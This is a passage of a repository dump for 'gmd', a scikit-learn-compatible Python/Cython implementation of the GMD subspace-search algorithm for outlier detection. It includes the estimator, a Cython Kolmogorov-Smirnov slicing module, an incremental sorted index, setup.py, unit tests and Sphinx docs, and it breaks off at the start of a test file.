"text": "# Tababble API using python\n\nExtract all the focusable elements (web element that can be selected using tab) from a web page maintaining the order using python and selenium\n\n\n\n### Prerequisites\n\npython packages you need to install :\n\n```\nselenium (version:3 or higher)\n```\nBrowser Driver (eg: Chrome web driver)\n\n\n## Set up\n\n1. Download the tab.py file or clone the repo\n2. change the webdriver location if needed\n```\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\Sumax\\Desktop\\Selenium\\chromedriver.exe\")\n``` \n3. That's all , run the tab.py file\n\n## Running the test\nWhen you run the file,\n1. This program first asks for the URL(user input) for which you want to extract the elements\n2. Then it checks the validation of the URL using regex\n3. If it passed , it extracts all the focusable elements and store it as an object with details in a global list of objects\n4. You can then create an excel sheet using the array of objects\n\n\n## Built With\n\n* [Selenium](https://pypi.org/project/selenium/) - The selenium package is used to automate web browser interaction from Python.\n\n\n## Contributing\n\nPlease read [CONTRIBUTING.md]() for details on our code of conduct, and the process for submitting pull requests to us.\n\n## Author\n\n* **Sumit Dey** - [Dey-Sumit](https://github.com/Dey-Sumit/)\n\n\n\n## License\n\nThis project is free to use,\nfeel free to fork the project\n"
},
{
"alpha_fraction": 0.6015157103538513,
"alphanum_fraction": 0.6060383915901184,
"avg_line_length": 27.590909957885742,
"blob_id": "3a24bcc4fe5f3c6f0935b627210a52154ffa37d7",
"content_id": "0518b96a7a2f251d06051734285b8b2b5e058ade",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8181,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 286,
"path": "/tab.py",
"repo_name": "Dey-Sumit/Tababble_api",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nimport re\n# regular expression to check the validation of url\n'''\nhttps://google.com -> valid\nhttps://google.com/abc -> valid\ngoogle.com -> not valid\netc..\n'''\nregex = re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE) \n\n# global variables\n# URl : stores the use given url\n# window handle : stored the current selenium controlled browser tab\n\ndriver,URL,window_handles = None,None,None\n\n#fetch the focusable elements in sequence\ndef fetch_current_page():\n global window_handles\n window_handles = driver.window_handles\n # switch to the latest opened window\n driver.switch_to.window(window_handles[len(window_handles)-1])\n \n # get the current page title\n #title = driver.execute_script(\"return document.title\")\n page_title = driver.title\n print(\"Page title: \",page_title)\n\n # -- java-script\n # get all the focusable elements which are visible in DOM in sequence\n elements = driver.execute_script(\"\"\"\n \nlet candidateSelectors = [\n 'input',\n 'select',\n 'textarea',\n 'a[href]',\n 'button',\n '[tabindex]',\n 'audio[controls]',\n 'video[controls]',\n '[contenteditable]:not([contenteditable=\"false\"])',\n];\nlet candidateSelector = candidateSelectors.join(',');\n\nlet matches =\n typeof Element === 'undefined'\n ? function () { }\n : Element.prototype.matches ||\n Element.prototype.msMatchesSelector ||\n Element.prototype.webkitMatchesSelector;\n\nfunction tabbable(el, options) {\n options = options || {};\n\n let regularTabbables = [];\n let orderedTabbables = [];\n\n let candidates = el.querySelectorAll(candidateSelector);\n\n if (options.includeContainer) {\n if (matches.call(el, candidateSelector)) {\n candidates = Array.prototype.slice.apply(candidates);\n candidates.unshift(el);\n }\n }\n\n let candidate;\n let candidateTabindex;\n for (let i = 0; i < candidates.length; i++) {\n candidate = candidates[i];\n\n if (!isNodeMatchingSelectorTabbable(candidate)) {\n continue;\n }\n\n candidateTabindex = getTabindex(candidate);\n if (candidateTabindex === 0) {\n regularTabbables.push(candidate);\n } else {\n orderedTabbables.push({\n documentOrder: i,\n tabIndex: candidateTabindex,\n node: candidate,\n });\n }\n }\n\n let tabbableNodes = orderedTabbables\n .sort(sortOrderedTabbables)\n .map(a => a.node)\n .concat(regularTabbables);\n\n return tabbableNodes;\n}\n\ntabbable.isTabbable = isTabbable;\ntabbable.isFocusable = isFocusable;\n\nfunction isNodeMatchingSelectorTabbable(node) {\n if (\n !isNodeMatchingSelectorFocusable(node) ||\n isNonTabbableRadio(node) ||\n getTabindex(node) < 0\n ) {\n return false;\n }\n return true;\n}\n\nfunction isTabbable(node) {\n if (!node) {\n throw new Error('No node provided');\n }\n if (matches.call(node, candidateSelector) === false) {\n return false;\n }\n return isNodeMatchingSelectorTabbable(node);\n}\n\nfunction isNodeMatchingSelectorFocusable(node) {\n if (node.disabled || isHiddenInput(node) || isHidden(node)) {\n return false;\n }\n return true;\n}\n\nlet focusableCandidateSelector = candidateSelectors.concat('iframe').join(',');\nfunction isFocusable(node) {\n if (!node) {\n throw new Error('No node provided');\n }\n if (matches.call(node, focusableCandidateSelector) === false) {\n return false;\n }\n return 
isNodeMatchingSelectorFocusable(node);\n}\n\nfunction getTabindex(node) {\n let tabindexAttr = parseInt(node.getAttribute('tabindex'), 10);\n if (!isNaN(tabindexAttr)) {\n return tabindexAttr;\n }\n // Browsers do not return `tabIndex` correctly for contentEditable nodes;\n // so if they don't have a tabindex attribute specifically set, assume it's 0.\n if (isContentEditable(node)) {\n return 0;\n }\n return node.tabIndex;\n}\n\nfunction sortOrderedTabbables(a, b) {\n return a.tabIndex === b.tabIndex\n ? a.documentOrder - b.documentOrder\n : a.tabIndex - b.tabIndex;\n}\n\nfunction isContentEditable(node) {\n return node.contentEditable === 'true';\n}\n\nfunction isInput(node) {\n return node.tagName === 'INPUT';\n}\n\nfunction isHiddenInput(node) {\n return isInput(node) && node.type === 'hidden';\n}\n\nfunction isRadio(node) {\n return isInput(node) && node.type === 'radio';\n}\n\nfunction isNonTabbableRadio(node) {\n return isRadio(node) && !isTabbableRadio(node);\n}\n\nfunction getCheckedRadio(nodes) {\n for (let i = 0; i < nodes.length; i++) {\n if (nodes[i].checked) {\n return nodes[i];\n }\n }\n}\n\nfunction isTabbableRadio(node) {\n if (!node.name) {\n return true;\n }\n // This won't account for the edge case where you have radio groups with the same\n // in separate forms on the same page.\n let radioSet = node.ownerDocument.querySelectorAll(\n 'input[type=\"radio\"][name=\"' + node.name + '\"]'\n );\n let checked = getCheckedRadio(radioSet);\n return !checked || checked === node;\n}\n\nfunction isHidden(node) {\n // offsetParent being null will allow detecting cases where an element is invisible or inside an invisible element,\n // as long as the element does not use position: fixed. For them, their visibility has to be checked directly as well.\n return (\n node.offsetParent === null || getComputedStyle(node).visibility === 'hidden'\n );\n}\n\nparent = document.body\nconst arr = tabbable(parent)\nreturn arr\n \"\"\")\n\n # traverse the array and print in formatted way\n total = len(elements)\n print(\"total elements \",total)\n data = [] # final array of objects\n\n for el in range(total):\n # create object for each element\n d = {\n# 'page_name':page_title,\n# 'id':elements[el].id\n }\n name = elements[el].get_attribute(\"name\")\n text = elements[el].text\n title = elements[el].get_attribute(\"title\")\n value = elements[el].get_attribute(\"value\")\n label = elements[el].get_attribute(\"aria-label\")\n outerHTML = elements[el].get_attribute(\"outerHTML\")\n \n if name:d['element'] = name\n elif text:d['element'] = text\n elif title:d['element'] = title\n elif value:d['element'] = value\n elif label: d['element'] =label\n else:\n d['element'] = \"NA\" # if no valid identifier found; \n d['HTML_tag'] = outerHTML\n print(d)\n # push it to the final array of objects\n data.append(d)\n \n# program starts here\nif __name__ == '__main__':\n isValidURL = False\n # check given url is valid or not\n while not isValidURL:\n URL = input(\" Enter the url: ex: https://www.example.com \")\n # url validation\n isValidURL = re.match(regex, URL)\n if not isValidURL:\n print(\"URL is not valid\")\n\n # if url is valid , go forward \n print(\"connecting...\")\n \n # driver set up \n driver = webdriver.Chrome(executable_path=r\"C:\\Users\\Sumax\\Desktop\\Selenium\\chromedriver.exe\")\n driver.maximize_window()\n driver.get(URL)\n print(\"connected; Browse the page...\") # connection established\n\n while True:\n print(\"1 : to fetch the current page data\")\n print(\"2 : to generate the log file 
in XLS format\")\n print(\"3 : to quit\")\n choice = int(input(\"Enter your choice\"))\n if choice == 1:\n fetch_current_page()\n if choice == 2:\n print(\"Not implemented in server side\")\n pass\n # use data list to generate XLS file\n #generate_log_file()\n if choice == 3:\n print(\"driver session killed ...\")\n driver.quit()\n break\n else:\n print(\"Enter valid input\") \n\n"
}
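`tab.py` leaves option 2 ("generate the log file in XLS format") unimplemented, and note that `data` is local to `fetch_current_page` despite the "global list" comment, so it must be returned or hoisted before export. A minimal CSV export sketch for the collected dicts (openpyxl or xlsxwriter would be the XLS route; the file name is illustrative):

```python
import csv

def write_log(rows, path="tab_order.csv"):
    # rows are the {'element': ..., 'HTML_tag': ...} dicts built in
    # fetch_current_page.
    if not rows:
        return
    with open(path, "w", newline="", encoding="utf-8") as f:
        writer = csv.DictWriter(f, fieldnames=["element", "HTML_tag"])
        writer.writeheader()
        writer.writerows(rows)

write_log([{"element": "Search", "HTML_tag": "<input name='q'>"}])
```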
] | 2 |
Aaron09/LiveDataLab-PBLP-ExampleProject | https://github.com/Aaron09/LiveDataLab-PBLP-ExampleProject | 632cb0510c32bf787ab49cb5eabd7c3e06d4c007 | 52cfce90a9186b4fe0c28f48fb181a6adb1073cf | ce517a233c177a3c2c387ac7115f5241400bbd77 | refs/heads/master | 2020-12-05T00:06:58.927715 | 2020-01-26T03:30:11 | 2020-01-26T03:30:11 | 231,945,418 | 2 | 0 | null | 2020-01-05T16:30:46 | 2020-01-05T16:28:37 | 2020-01-05T16:28:04 | null |
[
{
"alpha_fraction": 0.7675940990447998,
"alphanum_fraction": 0.7675940990447998,
"avg_line_length": 100.83333587646484,
"blob_id": "e88755ea95524627e0d19d6f6c1c352e2fe1435e",
"content_id": "1c5f84c8c8e739444c7e24ec946b974292747a31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1222,
"license_type": "no_license",
"max_line_length": 318,
"num_lines": 12,
"path": "/README.md",
"repo_name": "Aaron09/LiveDataLab-PBLP-ExampleProject",
"src_encoding": "UTF-8",
"text": "# Example Project\nThis is an example project for the LiveDataLab Project-Based Learning Platform.\n\n### Setting up the project\nTo work on this project, you should first link your Github account within the LiveDataLab dashboard [TODO: Add link to website here]. This allows you to leverage the submission infrastructure where we execute your code in the cloud.\n\nAfter linking your Github account, you should fork this repository to create your own version. Next, in that forked repo, go to `settings` -> `webhooks` -> `Add webhook`. Enter `ADD LINK HERE` into the payload url, and select `application/json` as the `Content type`. Then click the `Add webhook` button at the bottom.\n\nYou're all set up and ready to go! You can now clone your forked repo to your computer and begin working. When you're ready to make a submission, all you need to do is push to your fork. After doing so, you can navigate back to the LiveDataLab dashboard to see the results.\n\n### Project Specifics\nThis project contains two source files: `main.py` and `mymath.py`. `main.py` is wrapper code for testing the functions within `mymath.py`. Your goal is to implement the four functions in `mymath.py`: `add`, `subtract`, `multiply`, and `divide`.\n"
},
{
"alpha_fraction": 0.5080214142799377,
"alphanum_fraction": 0.5721924901008606,
"avg_line_length": 25.714284896850586,
"blob_id": "c6aad1142f9b2f93701d6e9808e9f21e078ea365",
"content_id": "04af3cc47dfedc835b498476f01d296566b12298",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 187,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/main.py",
"repo_name": "Aaron09/LiveDataLab-PBLP-ExampleProject",
"src_encoding": "UTF-8",
"text": "import mymath\n\nif __name__ == \"__main__\":\n assert mymath.add(1, 2) == 3\n assert mymath.subtract(2, 1) == 1\n assert mymath.multiply(2, 3) == 6\n assert mymath.divide(4, 2) == 2\n"
}
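The project asks learners to fill in `mymath.py` so that the asserts in `main.py` pass; one possible minimal solution (not the official one):

```python
# mymath.py - one way to satisfy the asserts in main.py.
def add(a, b):
    return a + b

def subtract(a, b):
    return a - b

def multiply(a, b):
    return a * b

def divide(a, b):
    return a / b    # 4 / 2 == 2.0, which still satisfies `== 2`
```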
] | 2 |
andersonvaf/gmd | https://github.com/andersonvaf/gmd | ad7f46f6367fca0fbcc00663af46fdc64c10d3d4 | 5535e971d22b177267636aff495299fc29122bfc | 9daf66a76e4a06248fadfe28e58885da2811f0b1 | refs/heads/master | 2020-06-15T02:53:41.533178 | 2019-06-10T13:31:54 | 2019-06-10T13:31:54 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5546653866767883,
"alphanum_fraction": 0.5605560541152954,
"avg_line_length": 31.39694595336914,
"blob_id": "84c75ae3731342fd980725517651d49ec00f23a0",
"content_id": "8cd7ae1868b7df609b707b194824e66c0f1cc93f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4244,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 131,
"path": "/gmd/gmd.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThis is the scikit-learn compatible gmd module\n\"\"\"\nimport numpy as np\nfrom sklearn.base import BaseEstimator\nfrom sklearn.utils import check_random_state\nfrom sklearn.utils.validation import check_array, check_is_fitted\nfrom libgmdc import avg_deviation\nfrom libgmdc import set_seed\n\n\nclass GMD(BaseEstimator):\n \"\"\"GMD Estimator. Used to compute interesting subspaces in a dataset.\n \"\"\"\n\n def __init__(self, alpha=0.1, runs=100, random_state=None):\n \"\"\"Constructor for the GMD class\n\n Parameters\n ----------\n alpha :: float, default=0.1\n Determines the slice slice.\n runs :: int, default=100\n Number of Monte Carlo iterations\n random_state :: int, default=None\n Used to seed the C PRNG\n \"\"\"\n self.alpha = alpha\n self.runs = runs\n self.random_state = random_state\n\n def fit(self, X, y=None):\n \"\"\"Compute the interesting subspaces. The result can be found in `subspaces_`.\n\n Parameters\n ----------\n X :: {array-like, sparse matrix}, shape (n_samples, n_features)\n The training input samples.\n y :: default=None,\n Not used in the unsupervised setting.\n\n Returns\n -------\n self :: object\n Returns self.\n \"\"\"\n self._deviations = None\n self.is_fitted_ = False\n self.subspaces_ = {}\n self._sorted = None\n set_seed(self.random_state)\n\n X = check_array(X, ensure_min_samples=2)\n\n self._sorted = self.create_sorted_index(X)\n\n self.subspaces_, self.contrasts_ = self._interesting_subspaces()\n\n self.is_fitted_ = True\n return self\n\n def create_sorted_index(self, X):\n res = np.empty_like(X, dtype=np.int32)\n self._sorted = np.concatenate([X, np.array([range(0, len(X))]).T], axis=1)\n for i in range(X.shape[1]):\n self._sorted = self._sorted[self._sorted[:, i].argsort(kind=\"mergesort\")]\n res[:, i] = self._sorted[:, -1]\n return res.astype(np.int32)\n\n def _avg_deviation(self, subspaces, reference_dim):\n \"\"\"\n Compute the deviation in a subspace given the reference dimension.\n\n Parameters\n ----------\n subspaces : orthogonal projections defining the constraints of the hypercube\n reference_dim : the unconstrained projection\n\n Returns\n -------\n float with the deviation of the subspaces wrt. the reference_dim\n \"\"\"\n return avg_deviation(\n self._sorted,\n np.array(subspaces, dtype=np.int32),\n reference_dim,\n self.alpha,\n self.runs,\n )\n\n def _deviation_matrix(self):\n \"\"\"\n Compute the deviation of each pair of dimensions. 
Runs lazily.\n\n Returns\n -------\n 2-D array m x m, m being the count of attributes\n \"\"\"\n if self._deviations is None:\n cols = self._sorted.shape[1]\n out = np.zeros((cols, cols))\n for i in range(cols):\n for j in range(cols): # TODO: use symmetry\n if i != j:\n res = self._avg_deviation([i, j], i)\n out[i, j] = res\n self._deviations = out\n return self._deviations\n\n def _max_deviation_subspaces(self, reference_dimension):\n subspaces = []\n deviations = self._deviation_matrix() # TODO: only use vector here\n sorted_indices = np.argsort(deviations[reference_dimension]) # highest is last\n current_max = -1\n subspaces.append(reference_dimension)\n for i in reversed(sorted_indices):\n if i != reference_dimension:\n subspaces.append(i)\n tmp = self._avg_deviation(subspaces, reference_dimension)\n if tmp < current_max:\n subspaces.pop()\n else:\n current_max = tmp\n return subspaces, current_max\n\n def _interesting_subspaces(self):\n res = {}\n contrasts = {}\n for i in range(self._sorted.shape[1]):\n res[i], contrasts[i] = self._max_deviation_subspaces(i)\n return res, contrasts\n"
},
{
"alpha_fraction": 0.7258883118629456,
"alphanum_fraction": 0.7309644818305969,
"avg_line_length": 20.88888931274414,
"blob_id": "2d7d08c721f2bd680d8ca7f2487e8d105ade1eb6",
"content_id": "e733d5e5102c75dcc1dff61ab553a2233f0ebf15",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 9,
"path": "/tests/context.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"../gmd\")))\n\nfrom gmd import *\nfrom incsortedindex import *\nfrom evaluation import *\nimport libgmdc\n"
},
{
"alpha_fraction": 0.6096892356872559,
"alphanum_fraction": 0.6128884553909302,
"avg_line_length": 31.176469802856445,
"blob_id": "f84631c06c8aa672f90053cef671dc3edcb4f4a3",
"content_id": "fffc2309cae5c17e9ab774e299624ed5c014b3c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2188,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 68,
"path": "/setup.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\"\"\"A scikit-learn compatible python/cython implementation of the GMD algorithm.\"\"\"\n\nimport codecs\nimport os\n\nimport numpy as np\nfrom setuptools import find_packages, setup\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\n\nDISTNAME = 'gmd'\nDESCRIPTION = 'A scikit-learn compatible python/cython implementation of the GMD algorithm.'\nwith codecs.open('README.rst', encoding='utf-8-sig') as f:\n LONG_DESCRIPTION = f.read()\nMAINTAINER = 'Florian Kalinke'\nMAINTAINER_EMAIL = '[email protected]'\nURL = 'https://github.com/FlopsKa/gmd'\nLICENSE = 'MIT'\nDOWNLOAD_URL = 'https://github.com/FlopsKa/gmd'\nVERSION = '0.0.1'\nINSTALL_REQUIRES = ['numpy', 'scipy', 'scikit-learn']\nCLASSIFIERS = ['Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved',\n 'Programming Language :: Python',\n 'Topic :: Software Development',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 3.7']\nEXTRAS_REQUIRE = {\n 'tests': [\n 'pytest',\n 'pytest-cov',\n 'pandas'],\n 'docs': [\n 'sphinx',\n 'sphinx-gallery',\n 'sphinx_rtd_theme',\n 'numpydoc',\n 'matplotlib'\n ]\n}\n\nsetup(name=DISTNAME,\n maintainer=MAINTAINER,\n maintainer_email=MAINTAINER_EMAIL,\n description=DESCRIPTION,\n license=LICENSE,\n url=URL,\n version=VERSION,\n download_url=DOWNLOAD_URL,\n long_description=LONG_DESCRIPTION,\n zip_safe=False, # the package can run out of an .egg file\n classifiers=CLASSIFIERS,\n packages=find_packages(),\n install_requires=INSTALL_REQUIRES,\n extras_require=EXTRAS_REQUIRE,\n ext_modules=[\n Extension('libgmdc',\n sources=['gmd/libgmdc.pyx'],\n extra_compile_args=['-O3', '-ffast-math'],\n language='c')\n ],\n include_dirs=[np.get_include()],\n cmdclass={'build_ext': build_ext})\n"
},
{
"alpha_fraction": 0.7808219194412231,
"alphanum_fraction": 0.7808219194412231,
"avg_line_length": 20.899999618530273,
"blob_id": "c1937afc3199ccc6e48ad510fe276f76140581ae",
"content_id": "aca5869d79b2bd8c40dae0fc72431032771e69f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 219,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 10,
"path": "/tests/test_common.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import pytest\n\nfrom sklearn.utils.estimator_checks import check_estimator\n\nfrom .context import *\n\n\[email protected](\"Estimator\", [GMD])\ndef test_all_estimators(Estimator):\n return check_estimator(Estimator)\n"
},
{
"alpha_fraction": 0.6008026599884033,
"alphanum_fraction": 0.6258262395858765,
"avg_line_length": 32.1015625,
"blob_id": "8058a39f3582cf4de0abadb19daace7f298f08e1",
"content_id": "356a738d3b36513b26639b622c3b919669c7adfe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4236,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 128,
"path": "/gmd/libgmdc.pyx",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "#!python\n#cython: language_level=3, cdivision=True, boundscheck=False, wraparound=False, nonecheck=False\n\nimport cython\ncimport numpy as np\nimport numpy\nfrom libc.math cimport abs, ceil, pow\nfrom libc.stdlib cimport rand, srand\nfrom libc.limits cimport INT_MAX\n\nctypedef np.int32_t int32\nctypedef np.float64_t float64\nctypedef np.uint8_t uint8\n\ncdef extern from \"time.h\":\n long int time(int)\n\ndef set_seed(seed):\n if seed is None:\n srand(time(0))\n else:\n srand(seed)\n\ncdef int32 my_sum(uint8[:] view):\n cdef int32 i = 0, acc = 0\n for i in range(len(view)):\n acc += view[i]\n return acc\n\ncpdef float64 kstest(uint8[:] view, int32[:] sorted_index):\n \"\"\"\n Compute the Kolmogorov-Smirnov statistic on 2 samples. Assumes no ties.\n\n Parameters\n ----------\n view : 1-D array\n view is a logical array specifying the samples to include\n sorted_index : 1-D array\n the sorted Index\n\n Returns\n -------\n statistic : float\n \"\"\"\n cdef float64 cum_dist = 0.0\n cdef float64 max_dist = 0.0\n cdef int32 remaining = my_sum(view)\n cdef int32 total = sorted_index.shape[0]\n\n cdef int32 i = 0\n for i in range(total):\n if view[sorted_index[i]]:\n cum_dist += 1.0/remaining\n current_diff = abs(((i + 1.0)/total) - cum_dist)\n if current_diff > max_dist:\n max_dist = current_diff\n return max_dist\n\ncpdef subspace_slice(int32[:,:] sorted_index, int32[:] subspaces, int32 reference_dim, float64 alpha):\n \"\"\"\n Cuts a hypercube out of the full space and returns the contained data points.\n\n Parameters\n ----------\n subspaces : orthogonal projections defining the constraints of the hypercube\n reference_dim : the unconstrained projection\n\n Returns\n -------\n 1-D array with the length of the object count. If 1 the object is in the cube, if 0 it isn't\n \"\"\"\n return subspace_slice_oldest(sorted_index, subspaces, reference_dim, alpha)[0]\n\ncpdef subspace_slice_oldest(int32[:,:] sorted_index, int32[:] subspaces, int32 reference_dim, float64 alpha):\n \"\"\"\n Cuts a hypercube out of the full space and returns the contained data points.\n\n Parameters\n ----------\n subspaces : orthogonal projections defining the constraints of the hypercube\n reference_dim : the unconstrained projection\n\n Returns\n -------\n 1-D array with the length of the object count. 
If 1 the object is in the cube, if 0 it isn't\n \"\"\"\n cdef int32 rows = sorted_index.shape[0]\n cdef int32 slice_size = <int>ceil(rows * (pow(alpha, (1.0/(len(subspaces)-1)))))\n cdef uint8[:] selection = numpy.ones(rows, dtype=numpy.uint8)\n cdef int32 s, l, r, j, i\n cdef int32 smallest_contained_index = INT_MAX\n for i in range(len(subspaces)):\n s = subspaces[i]\n if s != reference_dim:\n l = rand() % (rows - slice_size)\n r = l + slice_size\n for j in range(0, l):\n selection[sorted_index[j, s]] = 0\n for j in range(r, rows):\n selection[sorted_index[j, s]] = 0\n\n # find the oldest index in the current slice\n # search across all slices (dimension-unaware)\n for j in range(l+1, r+1):\n if sorted_index[j, s] < smallest_contained_index:\n smallest_contained_index = sorted_index[j, s]\n return selection, smallest_contained_index\n\ncpdef avg_deviation(int32[:,:] sorted_index, int32[:] subspaces, int32 reference_dim, float64 alpha, int32 runs):\n \"\"\"\n Compute the deviation in a subspace given the reference dimension.\n\n Parameters\n ----------\n subspaces : orthogonal projections defining the constraints of the hypercube\n reference_dim : the unconstrained projection\n\n Returns\n -------\n float with the deviation of the subspaces wrt. the reference_dim\n \"\"\"\n cdef float64 result = 0.0\n cdef uint8[:] my_slice\n cdef int32[:] ref = sorted_index[:, reference_dim]\n for _ in range(runs):\n my_slice = subspace_slice(sorted_index, subspaces, reference_dim, alpha)\n result = result + kstest(my_slice, ref)\n return result/runs"
},
{
"alpha_fraction": 0.4756242632865906,
"alphanum_fraction": 0.5517241358757019,
"avg_line_length": 34,
"blob_id": "e89bf801d44a723b7e823e275877f80c15fa8aac",
"content_id": "9647d9a6770200bc57da39eca2ae16b74a44bddf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 24,
"path": "/tests/test_evaluation.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import unittest\nimport numpy as np\nimport pandas as pd\n\nfrom .context import *\n\n\nclass TestEvaluation(unittest.TestCase):\n def test_compute_jaccard_coeff(self):\n s1, s2, s3 = set([0, 1]), set([0, 2]), set([2, 3])\n\n np.testing.assert_almost_equal(jaccard_coeff(s1, s2), 1 / 3)\n np.testing.assert_almost_equal(jaccard_coeff(s1, s1), 1.0)\n np.testing.assert_almost_equal(jaccard_coeff(s1, s3), 0.0)\n\n def test_compute_sim_matrix(self):\n s1, s2, s3 = set([0, 1]), set([0, 2]), set([2, 3])\n df1 = pd.DataFrame({\"C0\": [s1, s2], \"C1\": [s2, s3], \"C2\": [s3, s1]})\n df2 = pd.DataFrame({\"C0\": [s1, s2], \"C1\": [s3, s1], \"C2\": [s1, s2]})\n\n np.testing.assert_array_almost_equal(\n similarity_matrix(df1, df2),\n np.array([[1.0, 1 / 3, 0.0], [1.0, 0.0, 1 / 3]]),\n )\n\n"
},
{
"alpha_fraction": 0.5081276297569275,
"alphanum_fraction": 0.5189644694328308,
"avg_line_length": 36.75,
"blob_id": "9f2007a8ecc9336a73cbd888d1f0902bea8f6443",
"content_id": "04473f6de307e9f5b79a90eb4433825ff9d70503",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1661,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 44,
"path": "/gmd/incsortedindex.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass IncSortedIndex:\n def __init__(self, start_data):\n my_sorted = np.concatenate(\n [start_data, np.array([range(0, len(start_data))]).T], axis=1\n )\n # Zeilen x Spalten x Tupel\n res = np.zeros((len(start_data), start_data.shape[1], 2))\n # Sort first window\n for col in range(start_data.shape[1]):\n my_sorted = my_sorted[my_sorted[:, col].argsort(kind=\"mergesort\")]\n res[:, col] = my_sorted[:, [col, -1]]\n self.res = res\n self.window_size = len(res)\n self.col_count = start_data.shape[1]\n\n def del_and_ins_sorted(self, new_value):\n for col in range(self.col_count):\n # search in indexes:\n delete_idx = np.argmin(self.res[:, col, 1]) \n # search in values:\n insert_idx = np.searchsorted(\n self.res[:, col, 0], new_value[col]\n ) \n\n if delete_idx == insert_idx:\n self.res[insert_idx, col] = [new_value[col], self.window_size]\n\n elif delete_idx < insert_idx:\n for i in range(delete_idx, insert_idx - 1):\n self.res[i, col] = self.res[i + 1, col]\n self.res[insert_idx - 1, col] = [new_value[col], self.window_size]\n\n elif delete_idx > insert_idx:\n for i in reversed(range(insert_idx, delete_idx)):\n self.res[i + 1, col] = self.res[i, col]\n self.res[insert_idx, col] = [new_value[col], self.window_size]\n self.res[:, :, 1] -= 1\n\n @property\n def sorted(self):\n return self.res[:, :, 1].astype(np.int32)\n"
},
{
"alpha_fraction": 0.7002801299095154,
"alphanum_fraction": 0.7516340017318726,
"avg_line_length": 37.21428680419922,
"blob_id": "bbc0849aeda5899c7f2977287729371148e56599",
"content_id": "18102ee9e2107dcdbee0b6faa601f32a0af1f69d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1071,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 28,
"path": "/docs/index.rst",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": ".. StreamGMD documentation master file, created by\n sphinx-quickstart on Mon May 20 20:04:41 2019.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to StreamGMD's documentation!\n=====================================\n\nThis project provides a scikit-learn compatible python implementation of the\nalgorithm presented in [`Trittenbach2018`_] together with some usage examples\nand a reproduction of the results from the paper.\n\nRecent approaches in outlier detection seperate the subspace search from the\nactual outlier detection and run the outlier detection algorithm on a\nprojection of the original feature space. See [`Keller2012`_]. As a result the\ndetection algorithm (Local Outlier Factor is used in the paper) does not suffer\nfrom the curse of dimensionality.\n\n\n.. _Trittenbach2018: https://link.springer.com/article/10.1007/s41060-018-0137-7\n.. _Keller2012: https://ieeexplore.ieee.org/document/6228154\n\n.. toctree::\n :maxdepth: 2\n :caption: Contents:\n\n quick_start\n user_guide\n\n"
},
{
"alpha_fraction": 0.583984375,
"alphanum_fraction": 0.638671875,
"avg_line_length": 19.479999542236328,
"blob_id": "4a6833ac61eab60ae674a5b6d7030eaef65660e3",
"content_id": "c4d39a6a207b4c59a02ab7a6093effdb0b56d9bd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 512,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 25,
"path": "/tests/test_gmd.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
